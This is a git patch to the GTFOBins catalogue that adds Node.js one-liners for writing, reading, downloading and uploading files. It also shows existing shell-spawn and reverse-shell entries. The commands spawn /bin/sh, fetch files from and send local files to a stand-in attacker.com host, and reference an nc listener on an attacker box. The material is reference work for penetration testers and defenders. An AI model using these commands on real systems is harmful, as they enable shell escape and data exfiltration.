From eca7899007a52ccf6327da9f27d442cc044074fe Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sat, 20 Feb 2021 12:17:28 +0100 Subject: [PATCH] Add Node.js file-{read,write,upload,download} Close #172. --- _gtfobins/node.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/_gtfobins/node.md b/_gtfobins/node.md index 1f551ef..ca7cf0f 100644 --- a/_gtfobins/node.md +++ b/_gtfobins/node.md @@ -3,6 +3,22 @@ functions: shell: - code: | node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})' + file-write: + - code: node -e 'fs.writeFileSync("file_to_write", "DATA")' + file-read: + - code: node -e 'process.stdout.write(fs.readFileSync("/bin/ls"))' + file-download: + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + node -e 'http.get(process.env.URL, res => res.pipe(fs.createWriteStream(process.env.LFILE)))' + file-upload: + - description: Send a local file via HTTP POST request. + code: | + export URL=http://attacker.com + export LFILE=file_to_send + node -e 'fs.createReadStream(process.env.LFILE).pipe(http.request(process.env.URL))' reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: |